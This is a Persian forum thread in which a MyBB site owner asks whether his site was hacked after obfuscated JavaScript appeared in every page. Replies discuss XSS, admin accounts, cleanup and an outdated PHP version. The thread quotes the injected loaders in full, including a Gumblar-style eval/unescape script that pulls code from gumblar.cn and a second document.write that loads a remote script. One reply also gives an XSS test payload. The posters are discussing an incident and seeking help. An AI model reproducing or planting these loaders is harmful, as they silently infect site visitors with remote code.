چند خط کد ، یا هک سایت

[1nafar]

سلام
چند روز پیش سرعت سایت من به شدت پایین اومده بود . من توی پشتیبانی فارسی mybb مطرح کردم و گفتن که یه قالب یا پلاگین نصب کردید و .... همه چیز به هم ریخته .
امروز توی صفحات سایت (توی سورس اونا ) کد های زیر بوجود اومده بود :

کد:

// -->
</script>
</head><script language=javascirpt><!--
(function(t){eval(unescape(('var@20a@3d@22Scrip@74@45n@67ine@22@2cb@3d@22V@65rsi@6fn()@2b@22@2cj@3d@22@22@2cu@3dnav@69gator@2e@75@73erAg@65@6et@3bif((@75@2ein@64exOf(@22@57in@22@29@3e@30@29@26@26(u@2ei@6ed@65xO@66(@22NT@206@22@29@3c@30@29@26@26(@64@6fcument@2ec@6fokie@2eind@65xOf(@22mi@65@6b@3d1@22)@3c0)@26@26(typeof(z@72vz@74s)@21@3dt@79peof(@22A@22@29))@7bzrvz@74s@3d@22A@22@3beva@6c(@22if@28w@69@6edo@77@2e@22+a+@22)j@3dj+@22+a+@22@4dajor@22+b+@61@2b@22M@69n@6f@72@22@2bb@2ba+@22@42u@69@6cd@22+b@2b@22j@3b@22@29@3bdocument@2ewrite(@22@3cscript@20s@72c@3d@2f@2fgumbl@61r@2e@63n@2frss@2f@3fi@64@3d@22@2bj+@22@3e@3c@5c@2fsc@72i@70t@3e@22)@3b@7d').replace(t,'%')))})(/@/g);
--></script>

من در پشتبانی انگلیسی مطرح کردم ، فرمودند سایت شما هک گردید ه است .
حالا من چند تا سوال دارم :
1- ایا واقعا سایت من هک شده ؟
2- در صورت درست بودن فرضیه هک من چه کار کنم ؟
ادرس سایت :
www.ir-man.com

---

[محمد حسینی]

این کد که همینطوری چیزی نداره! فقط یه توضیحه !
هر چند بعید نیست هک شده باشی! من فکر می کنم باگ xss باشه. اسکریپت های جاوا معمولا با xss رو سایت نوشته میشه. البته اگه واقعا هک شدی و هکری در کار بوده می تونسه صفحه رو دیفیس کنه!
کدهای سایت رو که دستکاری نکردی؟
کدوم سایتت رو میگی ؟ شب برگشتم یه اسکنش می کنم. acunetix جدید گرفتم !

[ha_60]

کد php:

var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write(" 


به نظر هک شده می یاد ولی احتمالا این تنها کد های مخرب نیست بازم باید باشه
یا سیستمت ویروسی بوده و فایل ها رو ویروسی فرستادی بالا یا واقعا هک شده
و برای رفع اول باید مشکل رو پیدا کنی باید ببینی از کجا اومدن

[1nafar]

کدهای سایت رو که دستکاری نکردی؟

سلام
من چیزی رو دست کاری نکردم ، اول سرعت سایت خیلی پایین بود ، پلاگین هارو حذف کردم و بعدم که .....

کدوم سایتت رو میگی ؟

www.ir-man.com

به نظر هک شده می یاد ولی احتمالا این تنها کد های مخرب نیست بازم باید باشه
یا سیستمت ویروسی بوده و فایل ها رو ویروسی فرستادی بالا یا واقعا هک شده
و برای رفع اول باید مشکل رو پیدا کنی باید ببینی از کجا اومدن

این کد توی تمامی صفحات سایت وجود داره . سیستم من مشکلی از نظر ویروس و .... نداره و به شدت محافظت میشه . (مثل سایت )

و برای رفع اول باید مشکل رو پیدا کنی باید ببینی از کجا اومدن

مشکل من هم همینه
پلیز هلپ می

[far_222000]

پلیز هلپ می

فارسی رو پاس بدارید(شوخی بود :d برای اینکه نگران نباشی!!! چون فهمیدی که این اتفاق افتاده دیگه جای نگرانی نیست، بهتره بفهمی از کدوم باگ بهت حمله شده)

[1nafar]

بهتره بفهمی از کدوم باگ بهت حمله شده)

سلام
حالا 100 % هک شده ؟
چه جوری این کد ها رو حذف کنم ؟
میشه یه خورده بیشتر توضیح بدید ؟

[saeedsmk]

سلام
خوب هستيد
اگه كليه صفحات باشه يك ذره دور از نظر كه هك باشه ( چون هكره اينقدر بي كار نيست ) . اما به نظز مي ايد از دسته باگ هاس xss است . چون دقيقا يك جاوا رو بصورت اسكريپت به صفحه اينجكت كرده .
يك سئوال ببين چه يوزر هاي دسترسي ادمين دارند و يوزر 0 يا روت مشكل نداره از نظر دسترسي . اگر يوزري ادمين بود و يا توي گروپ اي بود كه نبايد باشه صد در صد كار همون يوزرس .

به اميد ديدار

[1nafar]

سلام
تنها ادمین سایت خودم هستم و کسی دیگری در گروه مدیریت وجود نداره .

در ضمن کد پست اول درون صفحه ال سایت وجود داره
کد موجود در دیگر صفحات (تقریبا همه ، حتی پانل کنترل ) کد زیر هست :

کد php:

</head><script language=javascirpt><!-- 
document.write(unescape('%3CscriI1pZJt%20xLSsrcZJ%3D%2F%2F9eaN4eaN%2EV72V74qB7%2E2%2E13Zs93Zs5%2FI1jI1quI1eI1rxLSyxLS%2Ejs%3E%3C%2Fscri3ZspeaNtxLS%3E').replace(/eaN|ZJ|3Zs|I1|xLS|DUm|qB|V7/g,""));
 --></script>
<body> 


چه جوری مشکل رو حل کنم ؟

چون هكره اينقدر بي كار نيست

معمولا همه برای ما سنگ تموم میزارن و به ما لطف دارن

[amirjan]

mybb و xss ؟ (این "واو" مباینت هست ، مثل "مسلمان و دروغ؟")
بعیده ... فعلا اول برو توی template ها ، قسمت header ، این کد جاوا رو از توی کد ها حذف کن ... تا بعد بشینم سر فرصت ببینم قضیش چیه ...

[محمد حسینی]

mybb و xss ؟ (این "واو" مباینت هست ، مثل "مسلمان و دروغ؟")

اتفاقا کنترل پنل ما بی بی اگه یکم دستکاری بشه راحت در برابر xss نفوذپذیر میشه ! (چی گفتم !) الان تستش می کنم . . .

[محمد حسینی]

این سایت که غیر از صفحه اولش دیگه از هیچ جاش بالا نمیاد ! (ادبیات رو حال می کنی !)
اینطوری نمیشه تستش کرد ! خودت برو چندجای سایت که ورودی میگیره و نمایش میده این کد رو امتحان کن ببین اجرا میکنه ؟ مخصوصا کنترل پنل یا صفحه سرچ

کد:

<script>alert("iranvig.com")</script>

و اما اسکنر من یه چیز دیگه میگه !

PHP version older than 5.2.6

The PHP development team would like to announce the immediate availability of PHP 5.2.6. This release focuses on improving the stability of the PHP 5.2.x branch with over 120 bug fixes, several of which are security related. All users of PHP are encouraged to upgrade to this release.

Security Enhancements and Fixes in PHP 5.2.6:


Fixed possible stack buffer overflow in the FastCGI SAPI identified by Andrei Nigmatulin.
Fixed integer overflow in printf() identified by Maksymilian Aciemowicz.
Fixed security issue detailed in CVE-2008-0599 identified by Ryan Permeh.
Fixed a safe_mode bypass in cURL identified by Maksymilian Arciemowicz.
Properly address incomplete multibyte chars inside escapeshellcmd() identified by Stefan Esser.
Upgraded bundled PCRE to version 7.6